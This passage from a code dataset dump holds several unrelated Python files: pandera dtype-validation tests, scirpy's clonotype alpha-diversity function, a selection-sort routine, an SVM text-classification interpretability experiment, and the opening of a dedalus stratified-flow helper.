validated_df = schema.validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"category\")}\n )\n )\n assert isinstance(validated_df, pd.DataFrame)\n\n\ndef test_category_dtype_coerce():\n \"\"\"Test coercion of the category type is validated properly by\n schema.validate and fails safely.\"\"\"\n columns = {\n \"col\": Column(\n pa.Category,\n checks=Check(lambda s: set(s) == {\"A\", \"B\", \"C\"}),\n nullable=False,\n ),\n }\n\n with pytest.raises(SchemaError):\n DataFrameSchema(columns=columns, coerce=False).validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"object\")}\n )\n )\n\n validated_df = DataFrameSchema(columns=columns, coerce=True).validate(\n pd.DataFrame(\n {\"col\": pd.Series([\"A\", \"B\", \"A\", \"B\", \"C\"], dtype=\"object\")}\n )\n )\n assert isinstance(validated_df, pd.DataFrame)\n\n\ndef helper_type_validation(dataframe_type, schema_type, debugging=False):\n \"\"\"\n Helper function for using same or different dtypes for the dataframe and\n the schema_type\n \"\"\"\n df = pd.DataFrame({\"column1\": [dataframe_type(1)]})\n if debugging:\n print(dataframe_type, df.column1)\n schema = pa.DataFrameSchema({\"column1\": pa.Column(schema_type)})\n if debugging:\n print(schema)\n schema(df)\n\n\n@pytest.mark.parametrize(\n \"type1, type2\",\n [\n # Pandas always converts complex numbers to np.complex128\n (np.complex_, np.complex_),\n (np.complex_, np.complex128),\n (np.complex128, np.complex_),\n (np.complex64, np.complex128),\n (np.complex128, np.complex128),\n # Pandas always converts float numbers to np.float64\n (np.float_, np.float_),\n (np.float_, np.float64),\n (np.float16, np.float64),\n (np.float32, np.float64),\n (np.float64, np.float64),\n # Pandas always converts int numbers to np.int64\n (np.int_, np.int64),\n (np.int8, np.int64),\n (np.int16, np.int64),\n (np.int32, np.int64),\n (np.int64, np.int64),\n # Pandas always converts int numbers to np.int64\n (np.uint, np.int64),\n (np.uint, np.int64),\n (np.uint8, np.int64),\n 
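# Hedged illustration of the pandas nullable integer dtypes exercised by
# test_pandas_nullable_int_dtype above: the capitalized "Int64" string alias
# is the extension dtype, which can hold missing values, while lowercase
# numpy "int64" cannot.
import pandas as pd
s = pd.Series([1, 2, None], dtype="Int64")   # nullable extension dtype
print(s.isna().tolist())                     # [False, False, True]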
(np.uint16, np.int64),\n (np.uint32, np.int64),\n (np.uint64, np.int64),\n (np.bool_, np.bool_),\n (np.str_, np.str_)\n # np.object, np.void and bytes are not tested\n ],\n)\ndef test_valid_numpy_type_conversions(type1, type2):\n \"\"\"Test correct conversions of numpy dtypes\"\"\"\n try:\n helper_type_validation(type1, type2)\n except: # pylint: disable=bare-except\n # No exceptions since it should cover all exceptions for debug\n # purpose\n # Rerun test with debug inforation\n print(f\"Error on types: {type1}, {type2}\")\n helper_type_validation(type1, type2, True)\n\n\n@pytest.mark.parametrize(\n \"type1, type2\",\n [\n (np.complex_, np.int_),\n (np.int_, np.complex_),\n (float, np.complex_),\n (np.complex_, float),\n (np.int_, np.float_),\n (np.uint8, np.float_),\n (np.complex_, str),\n ],\n)\ndef test_invalid_numpy_type_conversions(type1, type2):\n \"\"\"Test various numpy dtypes\"\"\"\n with pytest.raises(SchemaError):\n helper_type_validation(type1, type2)\n\n PandasDtype.from_numpy_type(np.float_)\n with pytest.raises(TypeError):\n PandasDtype.from_numpy_type(pd.DatetimeIndex)\n\n\ndef test_datetime():\n \"\"\"Test datetime types can be validated properly by schema.validate\"\"\"\n schema = DataFrameSchema(\n columns={\n \"col\": Column(\n pa.DateTime,\n checks=Check(lambda s: s.min() > pd.Timestamp(\"2015\")),\n )\n }\n )\n\n validated_df = schema.validate(\n pd.DataFrame(\n {\"col\": pd.to_datetime([\"2019/01/01\", \"2018/05/21\", \"2016/03/10\"])}\n )\n )\n\n assert isinstance(validated_df, pd.DataFrame)\n\n with pytest.raises(SchemaError):\n schema.validate(pd.DataFrame({\"col\": pd.to_datetime([\"2010/01/01\"])}))\n\n\n@pytest.mark.skipif(\n PANDAS_VERSION.release < (1, 0, 0), # type: ignore\n reason=\"pandas >= 1.0.0 required\",\n)\ndef test_pandas_extension_types():\n \"\"\"Test pandas extension data type happy path.\"\"\"\n # pylint: disable=no-member\n test_params = [\n (\n pd.CategoricalDtype(),\n pd.Series([\"a\", \"a\", \"b\", \"b\", \"c\", \"c\"], dtype=\"category\"),\n None,\n ),\n (\n pd.DatetimeTZDtype(tz=\"UTC\"),\n pd.Series(\n pd.date_range(start=\"20200101\", end=\"20200301\"),\n dtype=\"datetime64[ns, utc]\",\n ),\n None,\n ),\n (pd.Int64Dtype(), pd.Series(range(10), dtype=\"Int64\"), None),\n (\n pd.StringDtype(),\n pd.Series([\"foo\", \"bar\", \"baz\"], dtype=\"string\"),\n None,\n ),\n (\n pd.PeriodDtype(freq=\"D\"),\n pd.Series(pd.period_range(\"1/1/2019\", \"1/1/2020\", freq=\"D\")),\n None,\n ),\n (\n pd.SparseDtype(\"float\"),\n pd.Series(range(100))\n .where(lambda s: s < 5, other=np.nan)\n .astype(\"Sparse[float]\"),\n {\"nullable\": True},\n ),\n (pd.BooleanDtype(), pd.Series([1, 0, 0, 1, 1], dtype=\"boolean\"), None),\n (\n pd.IntervalDtype(subtype=\"int64\"),\n pd.Series(pd.IntervalIndex.from_breaks([0, 1, 2, 3, 4])),\n None,\n ),\n ]\n for dtype, data, series_kwargs in test_params:\n series_kwargs = {} if series_kwargs is None else series_kwargs\n series_schema = SeriesSchema(pandas_dtype=dtype, **series_kwargs)\n assert isinstance(series_schema.validate(data), pd.Series)\n\n\ndef test_python_builtin_types():\n \"\"\"Test support python data types can be used for validation.\"\"\"\n schema = DataFrameSchema(\n {\n \"int_col\": Column(int),\n \"float_col\": Column(float),\n \"str_col\": Column(str),\n \"bool_col\": Column(bool),\n \"object_col\": Column(object),\n \"complex_col\": Column(complex),\n }\n )\n df = pd.DataFrame(\n {\n \"int_col\": [1, 2, 3],\n \"float_col\": [1.0, 2.0, 3.0],\n \"str_col\": list(\"abc\"),\n \"bool_col\": [True, False, 
True],\n \"object_col\": [[1], 1, {\"foo\": \"bar\"}],\n \"complex_col\": [complex(1), complex(2), complex(3)],\n }\n )\n assert isinstance(schema(df), pd.DataFrame)\n assert schema.dtype[\"int_col\"] == PandasDtype.Int.str_alias\n assert schema.dtype[\"float_col\"] == PandasDtype.Float.str_alias\n assert schema.dtype[\"str_col\"] == PandasDtype.String.str_alias\n assert schema.dtype[\"bool_col\"] == PandasDtype.Bool.str_alias\n assert schema.dtype[\"object_col\"] == PandasDtype.Object.str_alias\n assert schema.dtype[\"complex_col\"] == PandasDtype.Complex.str_alias\n\n\n@pytest.mark.parametrize(\"python_type\", [list, dict, set])\ndef test_python_builtin_types_not_supported(python_type):\n \"\"\"Test unsupported python data types raise a type error.\"\"\"\n with pytest.raises(TypeError):\n Column(python_type)\n\n\n@pytest.mark.parametrize(\n \"pandas_api_type,pandas_dtype\",\n [\n [\"string\", PandasDtype.String],\n [\"floating\", PandasDtype.Float],\n [\"integer\", PandasDtype.Int],\n [\"categorical\", PandasDtype.Category],\n [\"boolean\", PandasDtype.Bool],\n [\"datetime64\", PandasDtype.DateTime],\n [\"datetime\", PandasDtype.DateTime],\n [\"timedelta64\", PandasDtype.Timedelta],\n [\"timedelta\", PandasDtype.Timedelta],\n [\"mixed-integer\", PandasDtype.Object],\n ],\n)\ndef test_pandas_api_types(pandas_api_type, pandas_dtype):\n \"\"\"Test pandas api type conversion.\"\"\"\n assert PandasDtype.from_pandas_api_type(pandas_api_type) is pandas_dtype\n\n\n@pytest.mark.parametrize(\n \"invalid_pandas_api_type\",\n [\n \"foo\",\n \"bar\",\n \"baz\",\n \"this is not a type\",\n ],\n)\ndef test_pandas_api_type_exception(invalid_pandas_api_type):\n \"\"\"Test unsupported values for pandas api type conversion.\"\"\"\n with pytest.raises(TypeError):\n PandasDtype.from_pandas_api_type(invalid_pandas_api_type)\n\n\n@pytest.mark.parametrize(\n \"pandas_dtype\", (pandas_dtype for pandas_dtype in PandasDtype)\n)\ndef test_pandas_dtype_equality(pandas_dtype):\n \"\"\"Test __eq__ implementation.\"\"\"\n assert pandas_dtype is not None # pylint:disable=singleton-comparison\n assert pandas_dtype == pandas_dtype.value\n\n\n@pytest.mark.parametrize(\"pdtype\", PandasDtype)\ndef test_dtype_none_comparison(pdtype):\n \"\"\"Test that comparing PandasDtype to None is False.\"\"\"\n assert pdtype is not None\n\n\n@pytest.mark.parametrize(\n \"property_fn, pdtypes\",\n [\n [\n lambda x: x.is_int,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n ],\n ],\n [\n lambda x: x.is_nullable_int,\n [\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n ],\n ],\n [\n lambda x: x.is_nonnullable_int,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n ],\n ],\n [\n lambda x: x.is_uint,\n [\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n ],\n ],\n [\n lambda x: x.is_nullable_uint,\n [\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n ],\n ],\n [\n lambda x: x.is_nonnullable_uint,\n [\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n ],\n ],\n [\n lambda x: x.is_float,\n [\n PandasDtype.Float,\n PandasDtype.Float16,\n PandasDtype.Float32,\n PandasDtype.Float64,\n ],\n ],\n [\n lambda x: 
x.is_complex,\n [\n PandasDtype.Complex,\n PandasDtype.Complex64,\n PandasDtype.Complex128,\n PandasDtype.Complex256,\n ],\n ],\n [lambda x: x.is_bool, [PandasDtype.Bool]],\n [lambda x: x.is_string, [PandasDtype.String, PandasDtype.String]],\n [lambda x: x.is_category, [PandasDtype.Category]],\n [lambda x: x.is_datetime, [PandasDtype.DateTime]],\n [lambda x: x.is_timedelta, [PandasDtype.Timedelta]],\n [lambda x: x.is_object, [PandasDtype.Object]],\n [\n lambda x: x.is_continuous,\n [\n PandasDtype.Int,\n PandasDtype.Int8,\n PandasDtype.Int16,\n PandasDtype.Int32,\n PandasDtype.Int64,\n PandasDtype.INT8,\n PandasDtype.INT16,\n PandasDtype.INT32,\n PandasDtype.INT64,\n PandasDtype.UInt8,\n PandasDtype.UInt16,\n PandasDtype.UInt32,\n PandasDtype.UInt64,\n PandasDtype.UINT8,\n PandasDtype.UINT16,\n PandasDtype.UINT32,\n PandasDtype.UINT64,\n PandasDtype.Float,\n PandasDtype.Float16,\n PandasDtype.Float32,\n PandasDtype.Float64,\n PandasDtype.Complex,\n PandasDtype.Complex64,\n PandasDtype.Complex128,\n PandasDtype.Complex256,\n PandasDtype.DateTime,\n PandasDtype.Timedelta,\n ],\n ],\n ],\n)\ndef test_dtype_is_checks(property_fn, pdtypes):\n \"\"\"Test all the pandas dtype is_* properties.\"\"\"\n for pdtype in pdtypes:\n assert property_fn(pdtype)\n\n\ndef test_category_dtype_exception():\n \"\"\"Test that category dtype has no numpy dtype equivalent.\"\"\"\n with pytest.raises(TypeError):\n # pylint: disable=pointless-statement\n PandasDtype.Category.numpy_dtype\n","sub_path":"tests/core/test_dtypes.py","file_name":"test_dtypes.py","file_ext":"py","file_size_in_byte":18594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408601563","text":"import numpy as np\nfrom ..util import _is_na\nfrom anndata import AnnData\nimport pandas as pd\nfrom typing import Union\nfrom ..io._util import _check_upgrade_schema\n\n\n@_check_upgrade_schema()\ndef alpha_diversity(\n adata: AnnData,\n groupby: str,\n *,\n target_col: str = \"clone_id\",\n inplace: bool = True,\n key_added: Union[None, str] = None\n) -> pd.DataFrame:\n \"\"\"Computes the alpha diversity of clonotypes within a group.\n\n Uses the `Shannon Entropy `__ as\n diversity measure. The Entrotpy gets\n `normalized to group size `__.\n\n Ignores NaN values.\n\n Parameters\n ----------\n adata\n Annotated data matrix\n groupby\n Column of `obs` by which the grouping will be performed.\n target_col\n Column on which to compute the alpha diversity\n inplace\n If `True`, add a column to `obs`. 
Otherwise return a DataFrame\n with the alpha diversities.\n key_added\n Key under which the alpha diversity will be stored if inplace is `True`.\n Defaults to `alpha_diversity_{target_col}`.\n\n Returns\n -------\n Depending on the value of inplace returns a DataFrame with the alpha diversity\n for each group or adds a column to `adata.obs`.\n \"\"\"\n # Could rely on skbio.math if more variants are required.\n def _shannon_entropy(freq):\n \"\"\"Normalized shannon entropy according to\n https://math.stackexchange.com/a/945172\n \"\"\"\n np.testing.assert_almost_equal(np.sum(freq), 1)\n if len(freq) == 1:\n # the formula below is not defined for n==1\n return 0\n else:\n return -np.sum((freq * np.log(freq)) / np.log(len(freq)))\n\n ir_obs = adata.obs.loc[~_is_na(adata.obs[target_col]), :]\n clono_counts = (\n ir_obs.groupby([groupby, target_col], observed=True)\n .size()\n .reset_index(name=\"count\")\n )\n\n diversity = dict()\n for k in sorted(ir_obs[groupby].unique()):\n tmp_counts = clono_counts.loc[clono_counts[groupby] == k, \"count\"].values\n tmp_freqs = tmp_counts / np.sum(tmp_counts)\n diversity[k] = _shannon_entropy(tmp_freqs)\n\n if inplace:\n key_added = \"alpha_diversity_\" + target_col if key_added is None else key_added\n adata.obs[key_added] = adata.obs[groupby].map(diversity)\n else:\n return pd.DataFrame().from_dict(diversity, orient=\"index\")\n","sub_path":"scirpy/_tools/_diversity.py","file_name":"_diversity.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"308041135","text":"def selection(x, ascending=True):\n\n if len(x) == 0: # X의 요소가 없는 경우 함수 실행 안함\n return False\n\n try:\n x = list(x) # X를 리스트로 변환할 수 없는 경우 함수 실행 안함\n except:\n return False\n \n if ascending: # ascending 인자의 값이 True인 경우 오름차순 정렬\n for i in range(len(x)-1):\n min_val = x[i] # value\n min_idx = i # index\n for j in range(i+1, len(x)):\n if min_val > x[j]:\n min_val = x[j]\n min_idx = j\n x[min_idx] = x[i]\n x[i] = min_val\n\n return x\n \n else:\n for i in range(len(x)-1):\n max_val = x[i] # value\n max_idx = i # index\n for j in range(i+1, len(x)):\n if max_val < x[j]:\n max_val = x[j]\n max_idx = j\n x[max_idx] = x[i]\n x[i] = max_val\n\n return x\n \n\nif __name__ == '__main__':\n\n import random\n\n before = random.sample(range(1, 100), 10)\n print('list',before)\n\n after = selection(before)\n print('ascending',after)\n\n before = random.sample(range(1, 100), 10)\n print('list',before)\n\n after = selection(before, False)\n print('descending',after)\n","sub_path":"Algorithms/Sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"340904481","text":"from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn import svm, metrics\n\nimport numpy as np\n\nimport eli5\nfrom eli5.lime import TextExplainer\nfrom eli5.sklearn import PermutationImportance\n\nfrom sklearn.pipeline import Pipeline, make_pipeline\n\n# Setup training/eval data\n\nXtrain = [\n\t\t\"I am a cat\",\n\t\t\"What do i cat\",\n\t\t\"a cat is where its at\",\n\t\t\"how about that cat\",\n\t\t\"the cat there sat\",\n\n\t\t\"I am a dog\",\n\t\t\"What do i dog\",\n\t\t\"a dog is where its at\",\n\t\t\"how about that dog\",\n\t\t\"the dog there sat\",\n\n\t\t\"I am a rat\",\n\t\t\"What do i rat\",\n\t\t\"a rat is where its at\",\n\t\t\"how about that rat\",\n\t\t\"the rat 
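# Hedged worked example for the normalized Shannon entropy used by
# alpha_diversity above: for clonotype frequencies [0.5, 0.25, 0.25],
# H = -(0.5*ln 0.5 + 0.25*ln 0.25 + 0.25*ln 0.25) / ln 3 ~= 1.0397 / 1.0986 ~= 0.946
import numpy as np
freq = np.array([0.5, 0.25, 0.25])
print(-np.sum(freq * np.log(freq)) / np.log(len(freq)))   # ~0.946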
there sat\",\n\t\t]\n\n'''\nXtrain = [\n\t\t\"The cat (Felis catus) is a small carnivorous mammal.\",\n\t\t\"It is the only domesticated species in the family Felidae and often referred to as the domestic cat to distinguish it from wild members of the family.\",\n\t\t\"The cat is either a house cat, a farm cat or a feral cat\",\n\t\t\"Domestic cats are valued by humans for companionship and for their ability to hunt rodents.\", \n\t\t\"About cat breeds are recognized by anatomy various cat registries.\",\n\t\t\n\t\t\"The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf\",\n\t\t\"or Canis familiaris dog when considered a distinct species) is a member of the genus Canis (canines)\",\n\t\t\"which forms part cat cat of dog the wolf-like canids, and is the most widely abundant terrestrial carnivore.\",\n\t\t\"The dog and the extant dog gray wolf are sister taxa as modern wolves are not closely related to the wolves\",\n\t\t\"that were first domesticated, dog which implies that the direct ancestor of the dog is extinct. \",\n\n\t\t\"Rats rat are various medium-sized, long-tailed rodents.\",\n\t\t\"Species of rat rats are found throughout the order Rodentia,\",\n\t\t\"but stereotypical rats are rat found in the genus Rattus. \",\n\t\t\"Other rat genera rat include Neotoma (pack rats),\",\n\t\t\"Bandicota (bandicoot rats) and rat Dipodomys (kangaroo rats).\",\n\t\t]\n'''\n\n#Ytrain = [0,0,0,0,0,1,1,1,1,1]\n#Ytrain = [0,0,0,0,0,1,1,1,1,1, 1,1,1,1,1]#2,2,2,2,2]\nYtrain = [0,0,0,0,0,1,1,1,1,1, 2,2,2,2,2]\n\nXeval = [\n\t\t\"it was a cat\",\n\t\t\"it was a dog\",\n\t\t\"it was a rat\",\n\n\t\t\"I watched cat where it sat\",\n\t\t\"I watched dog where it sat\",\n\t\t\"I watched rat where it sat\",\n\t\t\t\t\n\t\t\t]\n\n\n\n'''\nXeval = [\n\t\t\"The cat is similar in anatomy to the other felid species, \",\n\t\t\"has a strong flexible body, quick reflexes, sharp teeth and retractable claws cat adapted to killing small prey.\",\n\t\t\"Its night vision and sense of smell are well developed. Cat communication cat includes vocalizations like meowing, purring,\",\n\t\t\"trilling, hissing, growling and grunting as well as cat-specific body cat language. It is a solitary hunter, but a social species.\",\n\n\t\t\"Their long association with humans has led dogs to be uniquely dog attuned to human behavior\",\n\t\t\"and they are able to thrive on a starch-rich diet that would dog be inadequate for other canids.\",\n\t\t\"Dogs vary widely in shape, size and colors. They perform dog many roles for humans, such as hunting,\",\n\t\t\"herding, pulling loads, protection, assisting police dog and military, companionship and, more recently, aiding disabled people and therapeutic roles.\",\n\t\t\n\t\t\"Rats are typically distinguished rat from mice by their size.\" ,\n\t\t\"Generally, when someone discovers a rat large muroid rodent, \",\n\t\t\"its common name includes the term rat, while if it is smaller, \",\n\t\t\"its name includes the term mouse. 
The rat common terms rat and mouse are not taxonomically specific.\",\n\t\t]\n'''\n\nYeval = [0,1,2,0,1,2]\n#Yeval = [0,1,1,0,1,1,]#[0,1,2,0,1,2]#[0,0,0,0,1,1,1,1,2,2,2,2]\n#Yeval = [0,1,0,1]#[0,0,0,0,1,1,1,1,2,2,2,2]\n\n\n# define model\ntfidf = CountVectorizer()\n#tfidf = TfidfVectorizer(ngram_range=(1,1), sublinear_tf=True)\nclf = svm.SVC(max_iter=100, tol=1e-4, probability=True, \n\tkernel='linear', decision_function_shape='ovr' )\n\n#clf = svm.LinearSVC( )\n\nXtrain_tfidf = tfidf.fit_transform(Xtrain)\nclf.fit(Xtrain_tfidf, Ytrain)\n\n# fit model\npred = clf.predict(tfidf.transform(Xeval))\nprint(metrics.accuracy_score(pred, Yeval))\n\n# understanding features\nfn_src = np.array(tfidf.get_feature_names())\nvocab = tfidf.vocabulary_\nprint(fn_src)\n\ncoef = clf.coef_.toarray()\nprint(coef.shape)\n\nfor label in range(coef.shape[0]):\n\n\tprint('')\n\tprint(\"Label: \", label)\n\n\tcf = coef[label].reshape(-1)\n\n\torder = cf.argsort()\n\tcf = cf[order][::-1]\n\tfn = fn_src[:][order][::-1]\n\n\tfor f, c in zip(fn, cf):\n\t\tprint(f, vocab[f], c)\n\nprint(clf.intercept_)\nprint(tfidf.transform(Xeval).shape)\nprint(coef.shape)\n\n\n\nprint('--------------')\nprint('')\n\na = tfidf.transform(Xeval).toarray()\nb = clf.coef_.toarray().T\n\nprint(a.shape, b.shape)\n\ndec = np.dot(a, b)\n\nprint(dec.shape)\nprint(dec)\nprint(np.argmax(dec, axis = 1))\n\nprint(clf.decision_function(a))\n\n\n\nprint('--')\n\nprint(clf.decision_function_shape == 'ovr' and len(clf.classes_) > 2)\n\ndef _ovr_decision_function(predictions, confidences, n_classes):\n \"\"\"Compute a continuous, tie-breaking OvR decision function from OvO.\n\n It is important to include a continuous value, not only votes,\n to make computing AUC or calibration meaningful.\n\n Parameters\n ----------\n predictions : array-like, shape (n_samples, n_classifiers)\n Predicted classes for each binary classifier.\n\n confidences : array-like, shape (n_samples, n_classifiers)\n Decision functions or predicted probabilities for positive class\n for each binary classifier.\n\n n_classes : int\n Number of classes. 
n_classifiers must be\n ``n_classes * (n_classes - 1 ) / 2``\n \"\"\"\n n_samples = predictions.shape[0]\n votes = np.zeros((n_samples, n_classes))\n sum_of_confidences = np.zeros((n_samples, n_classes))\n\n k = 0\n for i in range(n_classes):\n for j in range(i + 1, n_classes):\n sum_of_confidences[:, i] -= confidences[:, k]\n sum_of_confidences[:, j] += confidences[:, k]\n votes[predictions[:, k] == 0, i] += 1\n votes[predictions[:, k] == 1, j] += 1\n k += 1\n\n max_confidences = sum_of_confidences.max()\n min_confidences = sum_of_confidences.min()\n\n if max_confidences == min_confidences:\n return votes\n\n # Scale the sum_of_confidences to (-0.5, 0.5) and add it with votes.\n # The motivation is to use confidence levels as a way to break ties in\n # the votes without switching any decision made based on a difference\n # of 1 vote.\n eps = np.finfo(sum_of_confidences.dtype).eps\n max_abs_confidence = max(abs(max_confidences), abs(min_confidences))\n scale = (0.5 - eps) / max_abs_confidence\n return votes + sum_of_confidences * scale\n\n'''\npredictions = dec < 0\nconfidences = -dec\nn_classes = len(clf.classes_)\n'''\nout = _ovr_decision_function(dec < 0, -dec, len(clf.classes_))\n\nprint(\"out:\")\nprint(out)\n'''\nprint(n_class, n_samples)\n\nvotes = np.zeros((n_samples, n_class))\nsum_of_conf = np.zeros((n_samples, n_class))\n\nk = 0\nfor i in range(n_class):\n\tfor j in range(i+1, n_class):\n\t\tprint(i, j, k)\n\t\tsum_of_conf[:, i] -= conf[:, k]\n\t\tprint (sum_of_conf)\n\t\tsum_of_conf[:, j] += conf[:, k]\n\t\tprint (sum_of_conf)\n\t\tvotes[pred[:, k] == 0, i] += 1\n\t\tvotes[pred[:, k] == 1, j] += 1\n\t\tk+=1\n\nprint(\"sum_of_conf\")\nprint(sum_of_conf)\nprint(\"sum_of_conf div\")\nprint((3 * (np.abs(sum_of_conf) +1)))\n\ntrans_conf = sum_of_conf / (3 * (np.abs(sum_of_conf) +1))\n#trans_conf = sum_of_conf / (2 * (np.abs(sum_of_conf) ))\nprint(\"trans_conf\")\nprint(trans_conf)\n\nout = votes + trans_conf\nprint(\"votes\")\nprint(votes)\n\nprint(\"out\")\nprint(out)\n\n\n\n\n\nprint('--------------')\nprint('')\n\nparams = clf.get_params()\nsv = clf.support_vectors_.toarray()\nnv = clf.n_support_\na = clf.dual_coef_.toarray()\nb = clf.intercept_\ncs = fn_src\nX = tfidf.transform(Xeval).toarray()\n\nprint(\"sv:\", sv.shape)\nprint(sv)\n\nprint(\"a:\", a.shape)\nprint(a)\n\nk = []\nfor vi in sv:\n\tprint('')\n\tprint(vi)\n\tprint(np.dot(vi, X))\n\tk.append(np.dot(vi, X))\n\t\n\n\n#k = [np.dot(vi, X) for vi in sv]\n\nprint(\"kernel:\", len(k))#len(k), len(k[0]))\nprint(k)\n\n\n\n#print(\"kernel:\", k)\n#print(nv)\n\n# define the start and end index for support vectors for each class\nstart = [sum(nv[:i]) for i in range(len(nv))]\nend = [start[i] + nv[i] for i in range(len(nv))]\n\nprint(\"start:\", start)\nprint(\"end:\", end)\n\n\n# calculate: sum(a_p * k(x_p, x)) between every 2 classes\n'''\n\n\n'''\nprint(\"a:\", a.shape)\nprint(a)\n#print(\"a[0]:\", a[0])\n\nfor i in range(len(nv)):\n\tfor j in range(i+1,len(nv)):\n\t\tfor p in range(start[j], end[j]):\n\t\t\tprint('')\n\t\t\tprint(i, j, p)\n\n\t\t\tprint(a[ i ][p])\n\t\t\tprint(k[p])\n\t\t\tprint(a[j-1][p])\n'''\n'''\nc = [ sum(a[ i ][p] * k[p] for p in range(start[j], end[j])) +\n sum(a[j-1][p] * k[p] for p in range(start[i], end[i]))\n for i in range(len(nv)) for j in range(i+1,len(nv))]\n\nprint(\"coeficients\")\nprint(np.array(c))\nprint(clf.coef_.toarray())\n\n# add the intercept\ndf = [sum(x) for x in zip(c, b)] \nprint(np.array(df))\n\nprint(clf.decision_function(X))\n'''\n\n'''\nperm = 
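# Hedged numeric check of _ovr_decision_function above for n_classes = 3:
# the OvO pair order is (0,1), (0,2), (1,2); a prediction of 0 votes for
# the first class of the pair, 1 for the second.
import numpy as np
preds = np.array([[0, 0, 1]])          # 0 beats 1, 0 beats 2, then 2 beats 1
confs = np.array([[0.2, 0.4, 0.1]])    # paired OvO confidences (made-up values)
print(_ovr_decision_function(preds, confs, 3))   # class 0 wins with 2 votes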
PermutationImportance(clf).fit(tfidf.transform(Xeval).toarray(), Yeval)\nout = eli5.show_weights(perm, feature_names=fn)\n\nprint(out.data)\n'''\n\n'''\n# build LIME TextExplainer\nte = TextExplainer(random_state=42)\npipe = make_pipeline(tfidf, clf)\nte.fit(Xeval[0], pipe.predict_proba)\n#out = te.show_prediction(target_names=[0,1])\nout = te.show_weights(target_names=[0,1])#eli5.show_weights(te, feature_names=tfidf.get_feature_names())\n\nprint(out.data)\n'''\n\n\n\n\n\n\n\n\n\n'''\nfeature_names_alpha = tfidf.get_feature_names()\nfeature_names = tfidf.vocabulary_\n\nfor j in range(X.shape[1]):\n\tprint(j, feature_names_alpha[j], [X[i][j] for i in range(X.shape[0])])\n'''\n'''\nclf = svm.SVC(tol=1e-4, probability=True, kernel='linear', \n\tdecision_function_shape='ovr' ).fit(Xmat, Y)\n\npipe = make_pipeline(tfidf, clf)\n\n\n\nte = TextExplainer(random_state=42)\nte.fit(Xeval, pipe.predict_proba)\nout = te.show_prediction(target_names=[0,1], feature_names=tfidf.get_feature_names())\n#out = te.show_weights(target_names=[0,1])\n\nprint(out.data)\n'''\n'''\n\nX_pmat = tfidf.transform(X_p).toarray()\nprint(X_pmat.shape, len(Y_p))\n\n#https://medium.com/towards-artificial-intelligence/how-to-use-scikit-learn-eli5-library-to-compute-permutation-importance-9af131ece387\nperm = PermutationImportance(clf).fit(X_pmat, Y_p)\nout = eli5.show_weights(perm, feature_names=feature_names_alpha)\n\n\nprint(out.data)\n'''\n\n\n'''\nimportance = clf.coef_.toarray()[0]\n\narray = ['']*len(feature_names)\n\nfor k in feature_names:\n\tarray[feature_names[k]] = k\n\nimportance, feature_names = zip(*sorted(zip(importance,feature_names)))\nimportance, feature_names = np.array(importance), np.array(feature_names)\n\nimportance = importance[::-1]\nfeature_names = feature_names[::-1]\n\nfor fn, imp in zip(feature_names, importance):\n\tprint(fn, imp)\n\nprint(clf.support_vectors_)\nprint(clf.support_)\nprint(clf.n_support_)\n'''\n\n'''\t\nimportance = clf.coef_.toarray()\nfeature_names = tfidf.vocabulary_\nsortedt_names = tfidf.get_feature_names()\n\nprint(feature_names)\nprint(len(importance[0]))\n\nfor k in sortedt_names:\n\tprint(k, importance[0][feature_names[k]])#, clf.coef_[1][feature_names[k]])\n'''","sub_path":"interp_test3.py","file_name":"interp_test3.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"301310613","text":"#!/usr/bin/env python\n'''\nhelper function to run the shared stratification scenario. 
user just has to\nspecify BCs and ICs\n'''\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport h5py\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dedalus import public as de\nfrom dedalus.extras.flow_tools import CFL\nfrom dedalus.extras.plot_tools import quad_mesh, pad_limits\n\nSNAPSHOTS_DIR = 'snapshots_%s'\n\n###\n### UTILS\n###\n\ndef get_omega(g, h, kx, kz):\n return np.sqrt((g / h) * kx**2 / (kx**2 + kz**2 + 0.25 / h**2))\n\ndef get_vph(g, h, kx, kz):\n norm = get_omega(g, h, kx, kz) / (kx**2 + kz**2)\n return norm * kx, norm * kz\n\ndef get_analytical_sponge(name, z_pts, t, params):\n \"\"\" gets the analytical form of the variables for radiative BCs \"\"\"\n uz_anal = params['A'] * np.exp(z_pts / (2 * params['H'])) *\\\n np.cos(params['KZ'] * z_pts - params['OMEGA'] * t)\n rho0 = params['RHO0'] * np.exp(-z_pts / params['H'])\n analyticals = {\n 'uz': uz_anal,\n 'ux': -params['KZ'] / params['KX'] * uz_anal,\n 'rho1': -rho0 * params['A'] / (params['H'] * params['OMEGA']) *\\\n np.exp(z_pts / (2 * params['H'])) *\\\n np.sin(params['KZ'] * z_pts - params['OMEGA'] * t),\n 'P1': -rho0 * params['OMEGA'] / params['KX']**2 * params['KZ'] *\\\n 